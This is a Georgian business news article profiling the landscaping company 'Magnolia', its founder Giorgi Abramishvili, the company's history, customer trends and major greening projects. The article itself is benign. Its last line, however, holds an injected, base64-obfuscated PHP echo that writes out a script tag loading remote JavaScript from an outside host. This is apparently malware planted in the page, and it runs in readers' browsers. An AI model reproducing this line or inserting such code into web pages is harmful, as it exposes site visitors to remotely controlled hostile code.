celsiusi
ავერსი შნაიდერი

 

       

           

      ძნელად მოიძებნება ადამიანი ვისაც სიამოვნებას არ ანიჭებს ლამაზი, მარადმწვანე, ტროპიკული, ყვავილოვანი, სხვადასხვა ჯიშის მცენარეებით გაშენებული სურნელოვანი სკვერები, ეზოები, ბაღები და ვერანდები. ეს ყოველივე კი, გარდა ლამაზისა, ადამიანებისთვის სარგებლის მომტანიცაა. ყველა ვთანხმდებით იმაზე, რომ მეტი მწვანე სივრცე - მეტი ჟანგბადი, მეტი სიცოცხლე და მეტი სილამაზეა. სწორედ ამ მიმართულებას და მიზანს ემსახურება კომპანია “მაგნოლია”, რომლის დამფუძნებელმა გიორგი აბრამიშვილმა მიზნად დაისახა გეზი ამ მიმართულებით აეღო და დევიზი - „თქვენი მწვანე სივრცე“ უფრო მეტი ადამიანის ცხოვრების დევიზად ექცია.

საინფორმაციო სააგენტო BUSINESS TIME ვრცლად მოგიყვებათ კომპანია “მაგნოლიაზე”.
მაგნოლია გიორგი 
 
იღბლიანი პროექტი - ტრამპლინი “მაგნოლიასთვის”
 
კომპანიის შესახებ მეტი დეტალების და ქართულ ბაზარზე ამ მიმართულებით არსებული მდგომარეობის შესახებ საინფორმაციო სააგენტო BUSINESS TIME, კომპანიის დამფუძნებელს და ხელმძღვანელს გიორგი აბრამიშვილს ესაუბრა. როგორც BUSINESS TIME-სთვის გახდა ცნობილი, „თქვენი მწვანე სივრცე“ - ამოცანა, რომელიც გიორგი აბრამიშვილმა მიზნად დაისახა, დიდი შრომისა და გათენებული ღამეების ხარჯზე იქნა მიღწეული. დასაწყისში არსებული ბევრი სირთულეების მიუხედავად, მიზანი მალე რეალობად იქცა. თუმცა, როგორც თავად გიორგი გვიყვება, წარმატება ადვილად არ მოსულა.
 
მისივე თქმით, არსებობდა გამოცდილება, იდეა ბიზნესის დაწყების, თუმცა არ იყო ფინანსები. 2015-2017 წლებში გიორგიმ კომპანია „საქართველოს ნერგების“ ხელმძღვანელობა ჩაიბარა და ბევრი სასარგებლო და საინტერესო პროექტი განახორციელა, შემდეგ იყო ესპანური კომპანია, სადაც კვლავ გამწვანების სექტორს ჩაუდგა სათავეში. იყო მივლინებები, გამოფენები, იზრდებოდა გამოცდილება და კიდევ უფრო ღვივდებოდა სურვილი, ჰქონოდა საკუთარი კომპანია.
 
მაგნოლია ქალაქი 
როგორც გიორგი ამბობს, არასტაბილურმა სამუშაო გარემოებებმა და რამდენჯერმე სამსახურის დაკარგვამ გადააწყვეტინა, თავად დაეწყო საქმე. შეძენილი გამოცდილებიდან და კავშირებიდან დაიწყო დიპლომატების ბაღების მოვლა- პატრონობა. გულმოდგინებამ და საქმის სიყვარულმა შედეგი გამოიღო და 2019 წლის გაზაფხულზე, მიიღო შემოთავაზება, ნატახტარში კოკა-კოლას ახალი საწარმოს გამწვანებასა და კეთილმოწყობაზე. ეს იყო წინადადება, რომელსაც ის დიდი პასუხისმგებლობით მოეკიდა. წარმოდგენილ პროექტებს შორის მისმა დაგეგმარებამ ყველაზე დიდი მოწონება დაიმსახურა და საბოლოოდ შეირჩა კიდევაც.
 მაგნოლია კოკა
 
 
“ეს იყო ტრამპლინი, მომავლის განვითარების პერსპექტივა. ამ წარმატებამ მოიტანა პირველი ინვესტიციაც და ბიზნეს იდეის პირველი პირობაც გაჩნდა. შევკრიბე კარგი გუნდი, პირველი „ინვესტიცია“ დაახლოებით 900 ლარი იყო, ამ თანხით შევიძინე საბაღე ინვენტარი (დღესაც ვინახავ), რომლითაც საბაღე მომსახურებას ვუწევდით გარკვეულ ობიექტებს, ასე დავაარსე კომპანია მაგნოლია“. - იხსენებს გიორგი BUSINESS TIME- თან.
 
მაგნოლია გუნდი 
კითხვაზე კომპანიის სახელად რატომ შეირჩა “მაგნოლია” გიორგი ასე გვპასუხობს: “ჩემი მოგზაურობებიდან ბევრი ლამაზი მცენარე მახსენდება, მაგრამ ინსპირაცია მაინც იტალიაში, ტოსკანას მხარეში ნანახი მაგნოლიაა, რომლის სილამაზემ ძლიერი შთაბეჭდილება მოახდინა ჩემზე და დღემდე ასეა, სწორედ ამიტომ დავარქვი “მაგნოლია”.
 
აღსანიშნავია, რომ დღეს კომპანია თანამშრომლობს ევროპისა და თურქეთის წამყვან სანერგეებთან. საქართველოში შემოაქვს მაღალი ხარისხის დეკორატიული, მარადმწვანე და ფოთოლმცვენი მცენარეები, იშვიათი ჯიშის ხეები, საკოლექციო ვარდები, ბონსაები, სხვადასხვა ტოპიარული ფორმის ნერგები. ასევე, ადგილობრივად გამოყვანილი ხეხილის ნერგები.
 
ვარდები
„მაგნოლიას“ დამფუძნებელი საინფორმაციო სააგენტო BUSINESS TIME-ის კითხვაზე, მხოლოდ იმპორტირებულ მცენარეებს სთავაზობთ მომხმარებლებს თუ ადგილობრივსაც, პასუხობს: - “სამწუხაროდ, საქართველოში ჯერ-ჯერობით არ არის გრძელვადიან პერიოდზე გათვლილი სანერგეები, რომლებიც უზრუნველყოფენ მაღალი ხარისხის ნერგების წარმოებას.
ევროპული ხარისხისგან საკმაოდ შორს ვართ, თუმცა ჩვენს ქვეყანაში სანერგეების განვითარება აუცილებლად დასაწყებია, რომ 20 და 30 წლის შემდეგ მაინც მივიღოთ ხარისხიანი, ევროპული სტანდარტის ნერგები საქართველოში.” 
 
354485579 816725806346593 6797867144461340578 n ტყუპი
რა სურს მომხმარებელს?!
გიორგი აბრამიშვილის შეფასებით, ქართველი მომხმარებელი, არის გემოვნებიანი და ძალიან დაკვირვებული, ამასთან ხანდახან ზედმეტი სიფრთხილითაც გამოირჩევიან. ამიტომაც, ვცდილობთ, ისეთი მცენარეები შევარჩიოთ, რომ სრულად დავაკმაყოფილოთ მათი მოთხოვნები.
 
“თუ ადრე მოდური იყო რკინა-ბეტონის ღობეები, ახლა პირიქით მწვანე, ცოცხალ ღობეებზეა მოთხოვნა. ადამიანებს სურთ, მეტ სიმწვანეს უცქერდნენ. ეს ალბათ ურბანულმა განვითარებამაც გამოიწვია. კომპანიის ძირითად სეგმენტს საშუალო და მაღალი შემოსავლების მქონე მომხმარებელი წარმოადგენს. წელს, დავამატეთ ისეთი მცენარეებიც, რომლის შეძენაც ყველასათვის ხელმისაწვდომია. ამასთან ვფიქრობ, დღეს საკმაოდ ტრენდულია ცოცხალი ღობის მოწყობა. მწვანე სივრცეში ხომ თავს ყველა მყუდროდ და კომფორტულად გრძნობს. ფოთლოვანი ხე-მცენარეებიდან კარგად გაყიდვადია ნეკერჩხლის სახეობები. წიწვოვნებიდან ვერცხლისფერი ნაძვი და კავკასიური სოჭი. ბუჩქოვნებიდან თითქმის ყველა პოზიციას ყავს თავისი მომხმარებელი.”
 
ქართველ მომხმარებლებთან დაკავშირებით გიორგიმ აღნიშნა, რომ ყოფილა შემთხვევებიც, როცა არასპეციალისტი აკეთებს გამწვანების ესკიზურ პროექტს. ვისაც წარმოდგენაც არ აქვს თუ რა გარემო პირობები სჭირდება არსებობისთვის ამათუიმ მცენარეს. რაც გარკვეულ უხერხულობას იწვევს და ხშირად ღიმილის მომგვრელიც ხდება.
 
“მახსენდება ერთი პროექტი, სადაც შენობის ბოლო სართულის ტერასაზე არქტიტექტორს „დაუხატავს“ 5-6 მეტრიანი ხეები და მისთვის გათვალისწინებული ამოშენებული ქოთნის ზომები იყო 35-40 სანტიმეტრი. დამკვეთს არქიტექტორის „ნახატი“ მოსწონდა, მაგრამ სამწუხაროდ პროექტი ვერ განხორციელდა მოცემული „ნახატის“ შესაბამისად”, - იხსენებს გიორგი ღიმილით.
 354477302 279607944596442 2901333705499893159 n
 
წარმატება დეტალებშია!
“მაგნოლიას” დამფუძნებელმა ვრცლად ისაუბრა იმ მთავარ პრინციპებზე, ღირებულებებზე, აუცილებლად გასათვალისწინებელ დეტალებზე, რაც ამ ბიზნესში აუცილებელია, იმისთვის რომ არ დაზარალდეს მომხმარებელი, არ დაზიანდეს ან დაიღუპოს მცენარე და ყოველივე ეს უარყოფითად არ დაუბრუნდეს კომპანიას.
 
„ხარისხი და კვლავ ხარისხი, ეს არის ჩვენი ნიშა. ჩვენ არ ვყიდით მხოლოდ მცენარეს. მომხმარებელმა უნდა მიიღოს სწორი ინფორმაცია მცენარის შესახებ. მისი დარგვისა და მოვლის თავისებურებებთან დაკავშირებით. ზოგადად, უმრავლეს შემთხვევაში, სამწუხაროდ, მომხმარებელი ან საერთოდ არ არის ინფორმირებული ან კიდევ არასწორად არის ინფორმირებული მცენარის შერჩევა/მოვლასთან დაკავშირებით. არ უნდა დაგვავიწყდეს, რომ მცენარე უპირველესად ცოცხალი ორგანიზმია, ის უნდა იყოს ჯანსაღი, დაირგას სწორად და შემდგომ მოხდეს მისი სწორად მოვლა. თუ ზემოთ ჩამოთვლილიდან ერთ-ერთი პირობა მაინც დაირღვა, დიდია შანსია იმისა, რომ მცენარე დაიღუპოს. ჩვენ ვაწვდით ჯანმრთელ ნერგებს და ვუწევთ კონსულტაციას სწორად დარგვაზე. ხშირად მომხმარებელი ითხოვს მცენარეს, რომელიც შეუსაბამოა იმ ლოკაციისთვის, სადაც მას სურს რომ ჩარგოს. აქ გასათვალისწინებელია ბევრი ფაქტორი როგორიცაა კლიმატი, მზის განაწილება, ნიადაგი და ა.შ. თუ მცენარე სწორად არ შეირჩა კონკრეტული ლოკაციისთვის რა თქმა უნდა არსებობს მომატებული რისკები იმისა, რომ მცენარე ვერ ადაპტირდეს და დაიღუპოს. სწორედ ამიტომ, კონსულტაციასთან ერთად, ჩვენს მომსახურებაში დავამატეთ მათი მოვლა-პატრონობის სერვისიც. ჩვენი მებაღეები სეზონური მოთხოვნებისა და აუცილებელი აგრო-ნორმების გათვალისწინებით უვლიან დამკვეთების ბაღებს.“
 
 355036673 1743287006106117 3736323651648325296 n
 
გიორგის თქმით, რაც დრო გადის, გამწვანების სექტორი იზრდება და კიდევ უფრო მოთხოვნადი ხდება, რასაც კომპანია “მაგნოლია” აქტიურად უწყობს ფეხს და მუდმივად ვითარდება სხვადასხვა მიმართულებით. კომპანიაში ამჟამად 15 ადამიანია დასაქმებული. მათთვის შექმნილია ყველა პირობა განვითარების, შრომისა და დასვენებისათვის. სამომავლო გეგმები დიდია - სექტორი მზარდია და განვითარებადი, მოთხოვნაც მატულობს, ჩვენი მიზანი ხარისხზე ორიენტირებაა. ხარისხიანი პროდუქციას პლიუს ხარისხიანი მომსახურება. ერთობლიობაში ეს არის კომპანიის გრძელვადიანი გათვლა სამომავლო განვითარებისთვის. სწორედ ეს არის რაც გამოგვარჩევს, ამ სფეროში ბევრი სხვა კომპანიისაგან. ჩვენთან მოსული ადამიანები ერთხმად აღნიშნავენ, რომ მცენარეები არიან ჯანმრთელები და მოვლილები.” - აღნიშნავს გიორგი.
მომავალი შრომაშია!
როგორც აღმოჩნდა გიორგი აბრამიშვილის სამომავლო გეგმაში შედის კომპანიის განვითარება არა მარტო გამწვანებისა და გაყიდვების მიმართულებით, არამედ ტურიზმისა და განტვირთვისთვის საგამოფენო სივრცის შექმნა.
 
“გვინდა, რომ შევქმნათ მეტი სამუშაო ადგილი. დავამატოთ მეტი საგამოფენო სივრცე. მეტი არჩევანი შევთავაზოთ ჩვენს მომხმარებლებს. „მაგნოლია“ არ არის მხოლოდ კერძო ბიზნესი, აქ დასაქმებულმა თუ სტუმრად მოსულმა ადამიანმა კომფორტულად უნდა იგრძნოს თავი. ეს გარემო მათთვის შინაურული და სასიამოვნო უნდა იყოს.”
 
აღსანიშნავია, რომ კომპანია “მაგნოლია” გახლავთ ის კომპანია , რომელსაც შესრულებული აქვს ისეთი დიდი და საპასუხისმგებლო პროექტები, როგორიცაა: ნატახტარში კოკა-კოლას საწარმოს გამწვანება, მაკდონალდსის ობიექტები თბილისსა (მათ მოვლა-პატრონობასაც კომპანია ახორციელებს) და ბათუმში, დეველოპერული კომპანია m 2 დაკვეთით შესრულებული გამწვანების სამუშაოები.
 მაგნოლია წინანდალი
ასევე, „მაგნოლია“ გახლდათ ნერგების მიმწოდებელი კომპანია, რომლითაც გაკეთდა “Radisson Collection” წინანდალი - სასტუმრო რედისონის ფასადი, ამბასადორი კაჭრეთი, სასტუმრო „ზეგ“, პრეზიდენტის სასახლე, ქუთაისში, რუსთაველის ქუჩა, გამარჯვების მოედანზე არსებული მწვანე თარგები. ასევე, ბორჯომის ცენტრალურ პარკში მოეწყო მწვანე საფარი და დაირგა დეკორატიული მცენარეები. პროექტების ჩამონათვალშია უამრავი კერძო ბაღი, რომელთა გამწვანებაც და მოვლა-პატრონობაც კომპანიის მიერ ხორციელდება. გიორგი აბრამიშვილის თქმით, 10 წლის წინ ამ სექტორში სულ თითზე ჩამოსათვლელი კომპანიები ოპერირებდნენ. დღეს კი შეიძლება ითქვას ყოველ სეზონზე ახალი კომპანიები იხსნებიან და იწყებენ საქმიანობას. აღნიშნულ მოცემულობას ბიზნესმენი ბაზარზე მოთხოვნის ზრდას უკავშირებს.
354348795 1282649655790343 8836777751714742480 n 
კონკურენცია დღეს საკმაოდ მაღალია . თუმცა რეალურად ხარისხიანი პროდუქციის იმპორტიორი არც თუ ისე ბევრია. ზოგმა არც იცის რა მცენარეს სთავაზობს მომხმარებელს, შესაბამისად ვერ უწევს შესაბამის კონსულტაციას მის მოვლაზე. თუმცა რა თქმა უნდა არიან დიდი გამოცდილების მქონე კომპანიებიც, რომლებიც ერთგულად უდგებიან თავიანთ საქმეს. ამ ბიზნესში ყველაზე მეტად გასათვალისწინებელი რაც არის ესაა: - პირველ რიგში ნებისყოფა, შრომა და შენი საქმის სიყვარული. სანერგე - ეს ნიშნავს გრძელვადიან საქმიანობას. შეცდომაა ფიქრობდე, რომ მოკლე პერიოდში შეიძლება მიაღწიო სერიოზულ წარმატებას. ამისთვის საჭიროა ბევრი შრობა, ნებისყოფა და სიყვარული იმ საქმისა რასაც აკეთებ”.

354226205 654103059594395 152281785472592876 n 

ავტორი
მირანდა შურღაია
2361
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");